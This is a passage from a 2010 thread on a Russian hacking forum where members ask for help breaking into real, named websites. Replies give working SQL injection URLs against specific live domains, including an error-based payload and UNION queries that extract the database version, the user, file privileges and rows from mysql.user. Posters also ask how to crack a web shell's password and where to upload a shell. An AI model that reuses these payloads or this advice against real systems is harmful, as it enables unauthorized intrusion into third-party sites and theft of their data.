04.05.2010, 12:09
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать? |
|
|
04.05.2010, 13:52
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от mailbrush
Код:
http://www.meningrey.net/%5c/
Что это за уязвимость такая? Где об этом можно почитать?
читалка обычная походу.. и mod_rewrite обычный
|
|
|
|
04.05.2010, 12:41
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
есть шелл с парольом..
как моjно наыти пароль ?
и пароль изменилось не стандартниы..
напримерь в wso парол root а здес что то друqое ..
как наыти ??
|
|
|
|
05.05.2010, 12:57
|
|
Познающий
Регистрация: 01.05.2010
Сообщений: 34
С нами:
8437355
Репутация:
-5
|
|
Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело
Последний раз редактировалось oko; 05.05.2010 в 13:02..
|
|
|
|
05.05.2010, 13:08
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
С нами:
9151094
Репутация:
10
|
|
Сообщение от oko
Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело
простое phpinfo тебе ничего особо полезного не даст.
|
|
|
|
05.05.2010, 16:00
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами:
8859263
Репутация:
334
|
|
Не смог раскрутить. Кто что скажет?
Код:
chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1
|
|
|
|
05.05.2010, 16:03
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
|
|
|
|
05.05.2010, 21:31
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+
file_priv:Y
Не могу найти админку, phpmyadmin или ftp.
Не могу прочитать файлы чтобы найти путь куда залить shell.
Что можете посоветовать?
|
|
|
|
05.05.2010, 23:26
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
С нами:
9796693
Репутация:
659
|
|
Сообщение от FlaktW
http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9+--+
file_priv:Y
Не могу найти админку, phpmyadmin или ftp.
Не могу прочитать файлы чтобы найти путь куда залить shell.
Что можете посоветовать?
нету у тебя там файл_прива, дядя
http://www.human-solutions.com/company/news_press_report_en.php?id=-195+union+select+1,2,3,4,concat_ws(':',user(),user ,file_priv),6,7,8,9 from mysql.user where user='tecmath'--+
tecmath@localhost:tecmath:N
|
|
|
|
05.05.2010, 18:41
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
|
|
что-то фантазии не хвататет:
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
